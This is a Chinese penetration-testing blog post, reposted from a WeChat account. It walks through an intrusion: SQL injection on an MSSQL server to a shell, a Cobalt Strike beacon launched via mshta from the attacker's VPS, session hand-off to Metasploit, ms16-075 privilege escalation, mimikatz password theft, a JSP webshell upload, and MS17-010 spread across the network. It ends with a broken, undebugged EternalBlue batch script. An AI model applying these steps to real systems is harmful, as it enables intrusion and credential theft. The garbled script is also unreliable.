安全攻防 | 记一次sql注入到内网漫游

admin 2023年1月12日08:30:29安全文章评论15 views2738字阅读9分7秒阅读模式

声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。


对于红队队员来说,打点之后最重要的就是横向的内网渗透了,但很多人都卡在了这一步,今天这篇文章就主要讲一讲cobaltstrike和msf的联动,内网渗透的一些小思路,以及我遇到的一些msf和cs的坑

1
从SQL注入到CS上线
SQL注入方面就不详细赘述了,相信大家都很了解,目标站存在一个POST型的注入,且为SA用户,MSSQL的数据库,所以我们呢就可以直接进行--OS-SHELL
安全攻防 | 记一次sql注入到内网漫游


我们先在cs建立一个监听,host填写vps地址,端口随便定义

Windows/beacon_http/reverse_http


安全攻防 | 记一次sql注入到内网漫游


下一步就是生成一个HTML木马,ATTacks-packages-HTML我们选择刚才新建的那个监听,然后选择方法powershell


安全攻防 | 记一次sql注入到内网漫游


之后就是选择你刚刚生成的木马,在你的vps上建立一个下载链接


安全攻防 | 记一次sql注入到内网漫游


在目标机器上通过mshta执行


安全攻防 | 记一次sql注入到内网漫游


然后这时候我们就会看到我们的CS里多出了一个目标


安全攻防 | 记一次sql注入到内网漫游


但是这个时候我们发现这个机器的权限是MSSQLSERVER,这对于我们来说是远远不够的,这个时候我们就要进行提权操作,CS中自带了几个提权的脚本,你也可以通过插件来获取其他提权脚本,但是我用CS的脚本进行提权都以失败告终,所以我需要把这个session传输到MSF里面


2
CS和MSF的session的互传

这一步是走向内网的第一步,也可以说是打点渗透的最后一步,可以说是非常重要的了,我们首先需要在CS中建立一个全新的监听,以便于session的传输


安全攻防 | 记一次sql注入到内网漫游


这个监听HOST填写你的vps,port随意,这里我的msf装在了vps上,所以我们打开vps,新建一个screen,运行msf,然后选择exploit/multi/handler之后我们设置payload,设置成和cs对应的如图所示

Windows/foreign/reverse_tcp

安全攻防 | 记一次sql注入到内网漫游


之后就是设置LHOST和LPORT,由于我的CS监听设置的地址就是vps的地址,所以我们在vps上监听0.0.0.0就可以,然后lport写刚刚你在cs上设置的port,一切设置完成我们先在msf上run起来,之后在cs上选择刚刚上线的机器,在beaconshell中输入spawn+刚刚你设置的msf监听名字就可以了,过一会儿我们就能看到msf中有机器上线


安全攻防 | 记一次sql注入到内网漫游


下一步就是利用msf提权,这里我们先把这个session放到后台,用bg命令就可以


安全攻防 | 记一次sql注入到内网漫游


之后我们用这个插件 post/multi/recon/local_exploit_suggester,进去之后我们set session * *就是刚刚你msf监听到的那个session的序号,这个插件就会自动检测目标系统版本以及可以利用的提权脚本,我们运行一下试试


安全攻防 | 记一次sql注入到内网漫游



可以看到,这些脚本就是可用的,这里我用了最后一个ms16-075这个漏洞


安全攻防 | 记一次sql注入到内网漫游


可以看到,提权成功,返回了一个新的system权限的session,下面我们尝试通过msf把这个session注入回到cs中使用

exploit/windows/local/payload_inject

把payload设置成我们cs建立的第一个监听的payload即

windows/meterpreter/reverse_http

然后设置host,port以及要传回去的session


安全攻防 | 记一次sql注入到内网漫游


我们可以看到CS上返回了一个system权限的shell


安全攻防 | 记一次sql注入到内网漫游


这个时候我们就可以愉快的使用mimikatz等工具来把administrator的密码偷来

但是有的机器改了RDP服务的端口怎么办呢,我们可以用cs的进程管理,找到rdp服务的PID,然后在beacon中输入powershell netstat -ano,就可以找到这个PID对应的端口了

安全攻防 | 记一次sql注入到内网漫游


安全攻防 | 记一次sql注入到内网漫游


3
内网渗透的一些思路

我们拿到了一台机器,如何进行下一步的内网嗅探呢,cs中自带了一个portscan,当然你也可以通过socks把nmap,msf之类的带入到内网,这里我们就用cs自带的工具

我们可以看到他的内网比较简单,我进去转了一圈发现也只有一些打印机,路由器,还有一个oracle,我们通过受害机的浏览器中保存的密码进入到了其中,新建项目即可传war包,上传jsp木马,还有就是剩下几台445的windows主机了,由于我比较懒,就不把msf带入了,直接传一个ms17010的利用工具


安全攻防 | 记一次sql注入到内网漫游


至此,内网全部主机沦陷,打完收工,内网方面错综复杂,大家可以注意一些未授权访问啊,弱口令啊,浏览器保存的密码啊,整理出属于这个网段的密码字典,然后密码复用,细心总会有意外惊喜

最后,贴上一个自己写的ms17010批量工具,是刚刚利用的时候突发奇想写的,还没调试,希望各位大佬不要笑话,有时间帮小弟调试修改一下,在这里给大家磕头了安全攻防 | 记一次sql注入到内网漫游安全攻防 | 记一次sql注入到内网漫游安全攻防 | 记一次sql注入到内网漫游

import sysimport osfor a in range (0,256):    a = str(a)    ip = "xx.xx.xx.""+a+"    def ms(config):        config=open('ms17010.rc','w')        config.write('use exploit/windows/smb/ms17_010_eternalblue'+"n")        config.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp'+"n")        config.write('set RHOST '+ip+"n")        config.write('set LHOST "445"n')        config.write('exploit'+"n")    ms('')def main():    mg=os.system('msfconsole -r /root/ms17010.rc')if __name__ == '__main__':    main()


-END-

▎经典文章推荐

靶场攻略 | vulhub_DC6
安全攻防 | frp内网穿透
渗透测试 | 攻击面信息收集
权限提升 | suid提权及修复方式
神兵利器 | DayBreak安装与使用
环境搭建 | CTFd动态靶机搭建笔记
权限提升 | suid提权及修复方式
环境搭建 | CTFd动态靶机搭建笔记
近源渗透 | 使用Aircrack-ng破解wifi密码
神兵利器 | 自动化钉钉推送主机端口信息!
安全运维 | tcprepaly工具的安装与使用!
安全攻防 | 多种方式关闭讨厌的defender!
安全攻防 | 记一次有趣的账户接管漏洞挖掘
内网渗透 | 全网最实用的反弹shell总结


安全攻防 | 记一次sql注入到内网漫游

扫描下方 二维码 加入我们吧!

安全攻防 | 记一次sql注入到内网漫游

原文始发于微信公众号(betasec):安全攻防 | 记一次sql注入到内网漫游

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月12日08:30:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  安全攻防 | 记一次sql注入到内网漫游 http://cn-sec.com/archives/1442080.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: